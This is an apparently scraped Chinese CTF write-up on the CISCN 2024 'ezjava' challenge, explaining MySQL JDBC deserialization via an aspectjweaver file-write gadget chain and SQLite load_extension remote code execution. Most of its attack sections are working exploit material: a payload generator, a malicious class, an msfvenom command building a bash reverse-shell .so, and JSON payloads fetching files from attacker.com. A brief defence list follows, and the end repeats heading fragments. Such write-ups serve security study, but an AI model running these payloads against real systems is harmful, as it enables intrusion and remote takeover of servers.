JDBC 漏洞利用与攻击技术深度分析<\/h1>

1. 漏洞背景与概述<\/h2>

本文详细分析2024年CISCN比赛中"ezjava"题目的漏洞利用技术，主要涉及两种攻击路径：<\/p>

MySQL JDBC反序列化漏洞利用<\/li>

SQLite JDBC加载恶意so文件实现RCE<\/li> <\/ol>

2. 环境分析<\/h2>

2.1 项目依赖分析<\/h3>

从pom.xml文件中可以看到关键依赖：<\/p>

<dependencies><\/span>
<\/span><\/span>    <!-- 可能被利用的数据库驱动 --><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.xerial<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>sqlite-jdbc<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.8.9<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>mysql<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>mysql-connector-java<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>8.0.13<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.postgresql<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>postgresql<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>42.7.2<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    
<\/span><\/span>    <!-- 反序列化利用关键组件 --><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.aspectj<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>aspectjweaver<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.9.5<\/version><\/span>
<\/span><\/span>        <scope><\/span>runtime<\/scope><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>3. MySQL JDBC反序列化攻击<\/h2>
3.1 攻击原理<\/h3>
利用MySQL JDBC客户端在特定配置下会反序列化服务器返回的数据的特性，结合aspectjweaver组件的文件写入功能，实现任意文件写入和代码执行。<\/p>
3.2 关键代码分析<\/h3>
3.2.1 UserBean类<\/h4>
public<\/span> class<\/span> UserBean<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> String age;<\/span>
<\/span><\/span>    private<\/span> Object obj;<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        ObjectInputStream.<\/span>GetField<\/span> gf =<\/span> ois.<\/span>readFields<\/span>();<\/span>
<\/span><\/span>        HashMap<<\/span>String,<\/span> byte<\/span>[]><\/span> a =<\/span> (<\/span>HashMap)<\/span> gf.<\/span>get<\/span>(<\/span>"obj"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        String name =<\/span> (<\/span>String)<\/span> gf.<\/span>get<\/span>(<\/span>"name"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        String age =<\/span> (<\/span>String)<\/span> gf.<\/span>get<\/span>(<\/span>"age"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        if<\/span> (<\/span>a ==<\/span> null<\/span>)<\/span> return<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            a.<\/span>put<\/span>(<\/span>name,<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>age));<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception var7)<\/span> {<\/span>
<\/span><\/span>            var7.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

可控的readObject<\/code>方法<\/li>
可以触发HashMap.put()<\/code>操作<\/li>
可以控制写入的内容(Base64解码后的age)和文件名(name)<\/li>
<\/ul>
3.2.2 利用链构造<\/h4>
利用aspectjweaver的SimpleCache$StoreableCachingMap<\/code>类：<\/p>

SimpleCache$StoreableCachingMap.put()<\/code><\/li>
SimpleCache$StoreableCachingMap.writeToPath()<\/code><\/li>
FileOutputStream.write()<\/code><\/li>
<\/ol>
3.3 攻击步骤<\/h3>

生成恶意类文件：<\/li>
<\/ol>
public<\/span> class<\/span> Evil<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
构造Payload生成器：<\/li>
<\/ol>
public<\/span> class<\/span> exp1<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        UserBean userBean =<\/span> new<\/span> UserBean();<\/span>
<\/span><\/span>        Constructor aspectjConstructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap"<\/span>)<\/span>
<\/span><\/span>            .<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        aspectjConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 关键点：指定写入路径
<\/span><\/span><\/span><\/span>        Object simpleCache =<\/span> aspectjConstructor.<\/span>newInstance<\/span>(<\/span>".\/target\/classes"<\/span>,<\/span> 12<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        userBean.<\/span>setObj<\/span>(<\/span>simpleCache);<\/span>
<\/span><\/span>        userBean.<\/span>setName<\/span>(<\/span>"Evil.class"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> content_byte =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>new<\/span> File(<\/span>"Evil.class"<\/span>).<\/span>toPath<\/span>());<\/span>
<\/span><\/span>        userBean.<\/span>setAge<\/span>(<\/span>Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>content_byte));<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化payload
<\/span><\/span><\/span><\/span>        FileOutputStream fileOutputStream =<\/span> new<\/span> FileOutputStream(<\/span>"payload"<\/span>);<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>fileOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>userBean);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
搭建恶意MySQL服务器：<\/li>
<\/ol>
使用Python脚本模拟MySQL服务器，当客户端连接时返回构造的恶意序列化数据。<\/p>
3.4 限制与绕过<\/h3>


路径问题<\/strong>：原题中指定了.\/target\/classes<\/code>路径，但在实际JAR包环境中可能不存在<\/p>

解决方案：改为写入\/tmp<\/code>等可写目录<\/li>
<\/ul>
<\/li>

二次利用<\/strong>：<\/p>

第一次写入恶意class文件<\/li>
第二次通过MySQL JDBC返回序列化数据触发反序列化<\/li>
<\/ul>
<\/li>
<\/ol>
4. SQLite JDBC攻击<\/h2>
4.1 攻击原理<\/h3>
利用SQLite的load_extension<\/code>功能加载恶意so文件实现RCE。<\/p>
4.2 攻击步骤<\/h3>

生成恶意so文件：<\/li>
<\/ol>
msfvenom -p linux\/x64\/exec CMD=<\/span>'echo bash -c "bash -i >& \/dev\/tcp\/ip\/port 0>&1"的base64编码|base64 -d|bash'<\/span> -f elf-so -o evil.so
<\/span><\/span><\/code><\/pre>
通过MySQL写入so文件：<\/li>
<\/ol>
修改之前的exp，将路径改为\/tmp<\/code>：<\/p>
Object simpleCache =<\/span> aspectjConstructor.<\/span>newInstance<\/span>(<\/span>"\/tmp"<\/span>,<\/span> 12<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
构造SQLite JDBC连接字符串触发：<\/li>
<\/ol>
{
<\/span><\/span>    "type"<\/span>: "3"<\/span>,
<\/span><\/span>    "tableName"<\/span>: "(select (load_extension(\"\/tmp\/evil.so\")));"<\/span>,
<\/span><\/span>    "url"<\/span>: "jdbc:sqlite:file:\/tmp\/db?enable_load_extension=true"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 进阶攻击：分阶段加载<\/h3>

第一阶段<\/strong>：上传恶意so文件<\/li>
<\/ol>
{
<\/span><\/span>    "type"<\/span>: "3"<\/span>,
<\/span><\/span>    "url"<\/span>: "jdbc:sqlite::resource:http:\/\/attacker.com\/evil.so"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
会在\/tmp<\/code>下生成sqlite-jdbc-tmp-{hash}.db<\/code>文件<\/li>
<\/ul>

第二阶段<\/strong>：上传恶意db文件<\/li>
<\/ol>
db文件内容：<\/p>
CREATE<\/span> VIEW<\/span> security<\/span> as<\/span> SELECT<\/span> (SELECT<\/span> load_extension('\/tmp\/sqlite-jdbc-tmp-db'<\/span>));
<\/span><\/span><\/code><\/pre>上传payload:<\/p>
{
<\/span><\/span>    "type"<\/span>: "3"<\/span>,
<\/span><\/span>    "url"<\/span>: "jdbc:sqlite::resource:http:\/\/attacker.com\/malicious.db"<\/span>,
<\/span><\/span>    "tableName"<\/span>: "security"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
第三阶段<\/strong>：触发执行<\/li>
<\/ol>
{
<\/span><\/span>    "type"<\/span>: "3"<\/span>,
<\/span><\/span>    "url"<\/span>: "jdbc:sqlite:file:\/tmp\/sqlite-jdbc-tmp-db?enable_load_extension=true"<\/span>,
<\/span><\/span>    "tableName"<\/span>: "security"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 防御措施<\/h2>


MySQL JDBC防御<\/strong>：<\/p>

设置系统属性mysql.jdbc.deserialization.whitelist<\/code><\/li>
使用最新版本MySQL Connector\/J<\/li>
避免使用不可信的MySQL服务器<\/li>
<\/ul>
<\/li>

SQLite防御<\/strong>：<\/p>

禁用load_extension功能<\/li>
设置SQLiteConfig.enable_load_extension(false)<\/code><\/li>
验证所有JDBC连接参数<\/li>
<\/ul>
<\/li>

通用防御<\/strong>：<\/p>

限制反序列化操作<\/li>
使用安全管理器限制文件系统访问<\/li>
及时更新所有依赖库<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
本文详细分析了两种JDBC攻击方式：<\/p>

通过MySQL JDBC反序列化漏洞结合aspectjweaver实现任意文件写入和代码执行<\/li>
利用SQLite的load_extension功能加载恶意so文件实现RCE<\/li>
<\/ol>
这两种攻击方式都利用了JDBC驱动的高级功能，在实际开发中需要特别注意这些功能的潜在风险。<\/p>

JDBC 漏洞利用与攻击技术深度分析<\/h1>

2. 环境分析<\/h2>

3. MySQL JDBC反序列化攻击<\/h2>

3.1 攻击原理<\/h3> 利用MySQL JDBC客户端在特定配置下会反序列化服务器返回的数据的特性，结合aspectjweaver组件的文件写入功能，实现任意文件写入和代码执行。<\/p>

3.2 关键代码分析<\/h3>

4. SQLite JDBC攻击<\/h2>

4.1 攻击原理<\/h3> 利用SQLite的load_extension<\/code>功能加载恶意so文件实现RCE。<\/p>

3.1 攻击原理<\/h3>
利用MySQL JDBC客户端在特定配置下会反序列化服务器返回的数据的特性，结合aspectjweaver组件的文件写入功能，实现任意文件写入和代码执行。<\/p>

4.1 攻击原理<\/h3>
利用SQLite的`load_extension<\/code>功能加载恶意so文件实现RCE。<\/p>`